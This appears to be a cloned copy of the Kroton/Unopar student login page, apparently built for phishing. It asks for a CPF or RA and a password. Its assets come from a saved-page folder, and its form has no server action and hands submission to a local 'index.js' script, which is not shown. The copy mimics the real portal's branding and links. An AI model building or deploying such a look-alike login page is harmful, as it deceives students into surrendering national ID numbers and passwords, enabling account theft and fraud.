<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="expires" content="-1">
    <title>Login Kroton</title>
    <link rel="shortcut icon" href="https://login.kroton.com.br/Content/favicon.ico">
    <link rel="stylesheet" media="screen" href="./Login Kroton_files/bootstrap.min.css">
    <link rel="stylesheet" media="screen" href="./Login Kroton_files/style.min.css">
    <link rel="stylesheet" media="screen" href="./Login Kroton_files/marca.min.css">
    <link rel="stylesheet" href="/Login Kroton_files/css.css">
    <style>
        body.login-img-pa {
            background-image: url('https://login.kroton.com.br/Content/img/unopar/login-pa.jpg');
        }
    </style>
</head>   
<body class="unopar login-img-pa vsc-initialized" style="width: 100% !important;">
    <style type="text/css">
        html.hs-messages-widget-open.hs-messages-mobile,
        html.hs-messages-widget-open.hs-messages-mobile body {
            overflow: hidden !important;
            position: relative !important
        }
        html.hs-messages-widget-open.hs-messages-mobile body {
            height: 100% !important;
            margin: 0 !important
        }
        #hubspot-messages-iframe-container {
            display: initial !important;
            z-index: 2147483647;
            position: fixed !important;
            bottom: 0 !important
        }
        #hubspot-messages-iframe-container.widget-align-left {
            left: 0 !important
        }

        #hubspot-messages-iframe-container.widget-align-right {
            right: 0 !important
        }

        #hubspot-messages-iframe-container.internal {
            z-index: 1016
        }

        #hubspot-messages-iframe-container.internal iframe {
            min-width: 108px
        }

        #hubspot-messages-iframe-container .shadow-container {
            display: initial !important;
            z-index: -1;
            position: absolute;
            width: 0;
            height: 0;
            bottom: 0;
            content: ""
        }

        #hubspot-messages-iframe-container .shadow-container.internal {
            display: none !important
        }

        #hubspot-messages-iframe-container .shadow-container.active {
            width: 400px;
            height: 400px
        }

        #hubspot-messages-iframe-container iframe {
            display: initial !important;
            width: 100% !important;
            height: 100% !important;
            border: none !important;
            position: absolute !important;
            bottom: 0 !important;
            right: 0 !important;
            background: transparent !important
        }
    </style>
    <div class="container-fluid">
        <div class="row">
            <div class="col-sm-6 col-lg-7">
                <p>&nbsp;</p>
            </div>
            <div class="col-sm-6 col-lg-5">
                <div class="row login">
                    <div class="logo text-center">
                        <img src="./Login Kroton_files/logopa.png" style="width: 90%">
                    </div>
                        <form class="form" id="form">
                            <div class="col-xs-12">
                                <h4 style="margin-top: 25px;">Bem-vindo aluno!</h4>

                                <input type="hidden" id="hidError" name="hidError">
                                <div class="alert alert-danger js-alert" style="display:none"></div>

                                <div class="alert alert-warning" style="display: none" id="trb">
                                    <i class="glyphicon glyphicon-exclamation-sign"></i>&nbsp;
                                    Está tendo problemas com seu login? <a class="alert-link"
                                        href="https://login.kroton.com.br/AccountAluno/AccountTrouble">Clique aqui</a>
                                </div>

                                <div class="form-group marca-sec-texto" data-icon="p">
                                    <input type="text" id="username" name="username" class="form-control"
                                        placeholder="CPF ou RA" maxlength="150" autocomplete="username">
                                    <i><small id="MensagemError" class="">CPF invalido.</small></i>
                                    <i><small id="campoVaziu" class="">Insira seu CPF</small></i>
                                </div>

                                <div class="form-group marca-sec-texto" data-icon="l">
                                    <input type="password" id="password" name="password" class="form-control"
                                        placeholder="Senha" value="" maxlength="16" autocomplete="current-password">
                                </div>

                                <div class="form-group">
                                    <span style="margin-top:10px">
                                        <label for="checkbox">
                                            <input type="checkbox" id="checkbox" name="lembrarMe">
                                            &nbsp;Salvar dados
                                        </label>
                                    </span>
                                </div>
                                <p class="clearfix">
                                    <a href="https://login.kroton.com.br/AccountAluno/AccountRegister"
                                        class="marca-link js-acesso">Esqueci minha senha</a>
                                    &nbsp;/ <a href="https://login.kroton.com.br/AccountAluno/AccountRegister"
                                        class="marca-link js-acesso">Primeiro acesso</a>
                                </p>
                                <div class="form-group padT">
                                    <button class="btn marca-btn" type="submit">ENTRAR</button>
                                </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="privacy-bar" id="privacyBar" style="display: none;"></div>
    <div class="barra text-center navbar-fixed-bottom">
        <a href="https://www.facebook.com/unoparuniversidade/" class="marca-bg" target="_blank">
            <img src="./Login Kroton_files/icon_face.png">
        </a>
        <a href="https://twitter.com/UNOPAR_Oficial" class="marca-bg" target="_blank">
            <img src="./Login Kroton_files/icon_twitter.png">
        </a>
        <a href="https://youtube.com/unoparuniversidade" class="marca-bg" target="_blank">
            <img src="./Login Kroton_files/icon_youtube.png">
        </a>
    </div>
    <div class="privacy-bar" id="privacyBar">
        <p class="privacy-bar-text col-sm-11 col-xs-12">Esse site utiliza cookies para oferecer uma melhor experiência de navegação, analisar como você interage em nosso site, otimizar o desempenho e personalizar o conteúdo. Ao utilizar este site, você concorda com o uso de cookies. Saiba mais em&nbsp;nosso <a href="https://www.canaldatransparencia.com.br/cogna" target="_blank" id="portal-link">Portal de Privacidade</a>.</p>
        <div class="privacy-bar-button-box col-sm-1 col-xs-12">
            <button type="submit" onclick="HidePrivacyBar();" id="privacyBarButton" class="btn privacy-bar-button">Ok</button>
            <span class="error" id="error"><p>Insira um CPF valido</p></span>
        </div>
    </div>

    <script src="./index.js"></script>

</body>
</html>